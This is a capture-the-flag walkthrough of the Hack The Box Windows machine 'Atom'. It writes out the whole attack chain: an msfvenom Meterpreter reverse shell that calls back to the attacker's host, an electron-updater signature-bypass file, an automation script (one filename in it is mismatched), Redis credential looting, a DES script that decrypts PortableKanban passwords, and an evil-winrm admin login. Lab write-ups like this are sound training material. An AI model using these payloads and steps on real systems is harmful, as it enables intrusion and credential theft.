Hack-The-Box-walkthrough[Atom]

Posted on 2021-04-23 Edited on 2021-07-11 In HackTheBox walkthrough Views: Word count in article: 1.7k Reading time ≈ 6 mins.

introduce

OS: Windows
Difficulty: Medium
Points: 30
Release: 17 Apr 2021
IP: 10.10.10.237

information gathering

first use nmap as usaul

┌──(root💀kali)-[~/hackthebox/machine/atom]
└─# nmap -sV -v -p- --min-rate=10000 10.10.10.237
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
135/tcp  open  msrpc        Microsoft Windows RPC
443/tcp  open  ssl/http     Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
6379/tcp open  redis        Redis key-value store
7680/tcp open  pando-pub?
Service Info: Host: ATOM; OS: Windows; CPE: cpe:/o:microsoft:windows

Port-80

There is a simple html page.

Let’s check https 443 port.

Same page on port 80 and 443 not so interesting.

Now let’s check with smbclient now.

┌──(root💀kali)-[~/hackthebox/machine/atom]
└─# smbclient -L \\10.10.10.237 -U ""
Enter WORKGROUP\'s password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        Software_Updates Disk      
SMB1 disabled -- no workgroup available

We have a interesting share called Software_Updates let’s check what’s inside.

┌──(root💀kali)-[~/hackthebox/machine/atom]
└─# smbclient -N "\\\\10.10.10.237\Software_Updates"
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Apr 23 10:30:59 2021
  ..                                  D        0  Fri Apr 23 10:30:59 2021
  client1                             D        0  Fri Apr 23 10:30:59 2021
  client2                             D        0  Fri Apr 23 10:30:59 2021
  client3                             D        0  Fri Apr 23 10:30:59 2021
  UAT_Testing_Procedures.pdf          A    35202  Fri Apr  9 07:18:08 2021

                4413951 blocks of size 4096. 1363676 blocks available
smb: \>

Inside folders there is nothing for us. but there is a pdf file. let get this real quick.

1 2	smb: \> get UAT_Testing_Procedures.pdf getting file \UAT_Testing_Procedures.pdf of size 35202 as UAT_Testing_Procedures.pdf (6.2 KiloBytes/sec) (average 6.2 KiloBytes/sec)

After reading the pdf i known that we can place the update in any client folder and the automated script check the update.

So if we place the rev shell instead of update so we can get the reverse shell. but for that we need to bypass the “Signature Validation”.

So i search the on google for electron-builder exploit and we got a good blog post.

Signature Validation Bypass Leading to RCE In Electron-Updater

After reading the blog i understand that how to bypass the Signature and get reverse shell.

I am using msfvenom for creating the reverse shell.

┌──(root💀kali)-[~/hackthebox/machine/atom]
└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.3 LPORT=9001 -f exe -o "r'luci.exe"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: r'luci.exe

┌──(root💀kali)-[~/hackthebox/machine/atom]
└─# shasum -a 512 "r'luci.exe" | cut -d " " -f1 | xxd -r -p | base64 -w 0                                                                         
xgDIC+MoZUuufkz10OlxptRGT8HR+z9vxdoL/4FZ/3JMG6NRKz7DK7B69BkolIORVfwDyVnxUUebyHp9vEtbAw==

We got the hash now let’s start our msfconsole to catch the rev shell.

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.3
LHOST => 10.10.14.3
msf6 exploit(multi/handler) > set lport 9001
lport => 9001
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.3:9001

Now we need to create a file called latest.yml and add our hash inside this file.

latest.yml

1
2
3

version: 1.2.3
path: http://10.10.14.3/r'luci.exe
sha512: xgDIC+MoZUuufkz10OlxptRGT8HR+z9vxdoL/4FZ/3JMG6NRKz7DK7B69BkolIORVfwDyVnxUUebyHp9vEtbAw==

Now start your python3 server on port 80 and we good to go.

1
2
3

┌──(root💀kali)-[~/hackthebox/machine/atom]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Now last thing you want to do is put the file inside client2 or client1 folder it’s your choice.

┌──(root💀kali)-[~/hackthebox/machine/atom]
└─# smbclient //10.10.10.237/Software_Updates/ -U " "
Enter WORKGROUP\ 's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Apr 23 11:01:33 2021
  ..                                  D        0  Fri Apr 23 11:01:33 2021
  client1                             D        0  Fri Apr 23 11:01:33 2021
  client2                             D        0  Fri Apr 23 11:01:33 2021
  client3                             D        0  Fri Apr 23 11:01:33 2021
  UAT_Testing_Procedures.pdf          A    35202  Fri Apr  9 07:18:08 2021

                4413951 blocks of size 4096. 1363764 blocks available
smb: \> cd client2
smb: \client2\> put latest.yml
putting file latest.yml as \client2\latest.yml (0.1 kb/s) (average 0.1 kb/s)
smb: \client2\>

After putting file wait for 10sec and you get the reverse shell in metasploit.

┌──(root💀kali)-[~/hackthebox/machine/atom]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.237 - - [23/Apr/2021 11:03:31] code 404, message File not found
10.10.10.237 - - [23/Apr/2021 11:03:31] "GET /r'luci.exe.blockmap HTTP/1.1" 404 -
10.10.10.237 - - [23/Apr/2021 11:03:31] "GET /r%27luci.exe HTTP/1.1" 200 -

1 2	meterpreter > getuid Server username: ATOM\jason

Boom we got the shell.

I will also share a bash script for automate the work for getting the rev shell.

luci.sh

IP=`ifconfig tun0| grep -w inet | awk '{print $2}'`
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP LPORT=9001 -f exe -o "r'luci.exe"
KEY=`shasum -a 512 "r's.exe" | cut -d " " -f1 | xxd -r -p | base64 -w 0`
cat <<EOF >> latest.yml
version: 1.2.3
path: http://$IP/r'luci.exe
sha512: $KEY
EOF
smbclient //10.10.10.237/Software_Updates/  -U " "%" "  -c "cd client2;put latest.yml"
python3 -m http.server 80

Now let’s get our user.txt file.

meterpreter > shell
Process 3512 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19042.906]
(c) Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>cd \Users\jason\Desktop
cd \Users\jason\Desktop

C:\Users\jason\Desktop>type user.txt
type user.txt
4c012cd118f6c7e788a1fac97663223f

Privilege escalation

let’s run winPEAS.

winPEASx64.exe

After running winPEAS i got two interesting things first a file called redis.windows-service.conf and second a service is running called redis-server.

First let’s get the file and see what’s inside.

C:\Users\jason\Desktop>cd C:\Program Files\Redis\
cd C:\Program Files\Redis\

C:\Program Files\Redis>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 9793-C2E6

 Directory of C:\Program Files\Redis

04/23/2021  02:30 AM    <DIR>          .
04/23/2021  02:30 AM    <DIR>          ..
07/01/2016  03:54 PM             1,024 EventLog.dll
04/02/2021  07:31 AM    <DIR>          Logs
07/01/2016  03:52 PM            12,618 Redis on Windows Release Notes.docx
07/01/2016  03:52 PM            16,769 Redis on Windows.docx
07/01/2016  03:55 PM           406,016 redis-benchmark.exe
07/01/2016  03:55 PM         4,370,432 redis-benchmark.pdb
07/01/2016  03:55 PM           257,024 redis-check-aof.exe
07/01/2016  03:55 PM         3,518,464 redis-check-aof.pdb
07/01/2016  03:55 PM           268,288 redis-check-dump.exe
07/01/2016  03:55 PM         3,485,696 redis-check-dump.pdb
07/01/2016  03:55 PM           482,304 redis-cli.exe
07/01/2016  03:55 PM         4,517,888 redis-cli.pdb
07/01/2016  03:55 PM         1,553,408 redis-server.exe
07/01/2016  03:55 PM         6,909,952 redis-server.pdb
04/02/2021  07:39 AM            43,962 redis.windows-service.conf
04/02/2021  07:37 AM            43,960 redis.windows.conf
07/01/2016  09:17 AM            14,265 Windows Service Documentation.docx
              16 File(s)     25,902,070 bytes
               3 Dir(s)   5,583,278,080 bytes free

C:\Program Files\Redis>type redis.windows-service.conf
type redis.windows-service.conf
# Redis configuration file example
requirepass kidvscat_yes_kidvscat
......

I found a password -> kidvscat_yes_kidvscat

And with this password we can connect with redis-server.

But first if you don’t have redis-cli so install that with this command.

1	apt-get install redis-tools

And here is the cheatsheet of redis-cli commands.

redis_cheatsheet

Now let’s connect with server.

Let’s list the keys.

┌──(root💀kali)-[~/hackthebox/machine/atom]
└─# redis-cli -h 10.10.10.237 -a kidvscat_yes_kidvscat
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
10.10.10.237:6379> keys *
1) "pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff"
2) "pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0"
3) "pk:ids:User"
4) "pk:ids:MetaDataClass"

Now let’s go with first user becuase first is always admin.

1
2

10.10.10.237:6379> get pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0
"{\"Id\":\"e8e29158d70d44b1a1ba4949d52790a0\",\"Name\":\"Administrator\",\"Initials\":\"\",\"Email\":\"\",\"EncryptedPassword\":\"Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi\",\"Role\":\"Admin\",\"Inactive\":false,\"TimeStamp\":637530169606440253}"

We got the hash:

1	Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi

Now the question is how to crack or decrypt this hash.

I again check the winPEAS result and i found something good.

I download the pdf and read the pdf.

After reading this i understand that portable-kanban stores all the setting and Encrypted Password.

Let’s search on google for any exploit for portable kanban.

PortableKanban Encrypted Password Disclosure
Python3 Script
Found a python3 script for Encrypted Password Disclosure.

With the help of this script i can decrypt the hash.

But the problem is the script require the file called PortableKanban.pk3 so i modify the script for our usecase.

decrypt.py

import json
import base64
from des import * #python3 -m pip install des

try:
    hash = str(input("Enter the Hash : "))
    hash = base64.b64decode(hash.encode('utf-8'))
    key = DesKey(b"7ly6UznJ")
    print("Decrypted Password : " + key.decrypt(hash,initial=b"XuVUm5fR",padding=True).decode('utf-8'))
except:
    print("Wrong Hash")

Before running the script install the req for that with this command.

1	pip3 install des

Now we are ready to decrypt the hash.

┌──(root💀kali)-[~/hackthebox/machine/atom]
└─# python3 decrypt.py 
Enter the Hash : Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi
Decrypted Password : kidvscat_admin_@123

And we got the password of Administrator -> kidvscat_admin_@123

Now let’s login with evil-winrm.

┌──(root💀kali)-[~/hackthebox/machine/atom]
└─# evil-winrm -i 10.10.10.237 -u 'administrator' -p 'kidvscat_admin_@123'

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
atom\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
6c3c26123ed7d7eae41b18343707d229